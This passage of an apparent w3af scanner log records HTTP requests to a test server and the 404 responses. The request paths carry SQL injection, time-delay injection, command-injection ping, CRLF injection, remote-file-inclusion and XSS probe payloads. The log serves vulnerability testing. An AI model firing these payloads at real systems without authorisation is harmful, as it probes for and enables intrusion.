                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %22 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%22'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="531">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/iDontExist HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about iDontExist has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='iDontExist'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="533">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/w3af%0D%0Avulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about w3af%0D%0Avulnerable073b%3A+ae5cw3af has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='w3af%0D%0Avulnerable073b%3A+ae5cw3af'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="535">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/w3af%0Dvulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about w3af%0Dvulnerable073b%3A+ae5cw3af has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='w3af%0Dvulnerable073b%3A+ae5cw3af'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="538">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/http%3A%2F%2Fw3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="565" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A%2F%2Fw3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="540">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/w3af%0Avulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about w3af%0Avulnerable073b%3A+ae5cw3af has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='w3af%0Avulnerable073b%3A+ae5cw3af'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="541">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/http%3A/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A//w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="542">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/hTtP%3A%2F%2Fw3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="565" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtP%3A%2F%2Fw3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="543">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/w3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/w3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="546">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="548">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/hTtP%3A/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtP%3A//w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="554">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/51+OR+51%3D51+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 51+OR+51%3D51+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='51+OR+51%3D51+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="567">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/51+AND+51%3D52+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 51+AND+51%3D52+ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='51+AND+51%3D52+'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="577">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%26%26ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26ping+-n+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26ping+-n+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="583">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/Thread.Sleep%283000%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Thread.Sleep%283000%29%3B&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="604">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/1%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="613">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%26%26ping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26ping+-c+4+localhost has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26ping+-c+4+localhost'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="645">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/oiVI3U0l HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about oiVI3U0l has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='oiVI3U0l'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="660">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/1%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%29%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%29%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="664">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%26%26%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about %26%26%2Fusr%2Fsbin%2Fping+-s+localhost+4 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='%26%26%2Fusr%2Fsbin%2Fping+-s+localhost+4'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="670">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/9rYJZoeZ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 9rYJZoeZ has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='9rYJZoeZ'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="686">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/s6oTQpp0 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about s6oTQpp0 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='s6oTQpp0'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="690">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/x1sas%3C%2F-%3Ex1sas%2F%2Ax1sas%22x1sasx1sas%27x1sasx1sas%60x1sasx1sas+%3D HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about x1sas%3C%2F-%3Ex1sas%2F%2Ax1sas%22x1sasx1sas%27x1sasx1sas%60x1sasx1sas+%3D has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='x1sas%3C%2F-%3Ex1sas%2F%2Ax1sas%22x1sasx1sas%27x1sasx1sas%60x1sasx1sas+%3D'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="696">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/53%22+OR+%2253%22%3D%2253 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 53%22+OR+%2253%22%3D%2253 has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='53%22+OR+%2253%22%3D%2253'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="703">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/1%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about 1%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='1%29%29%3Bwaitfor+delay+%270%3A0%3A3%27--'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="704">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/%7Cping+-n+4+localhost HTTP/1.1</status>
                    <headers>
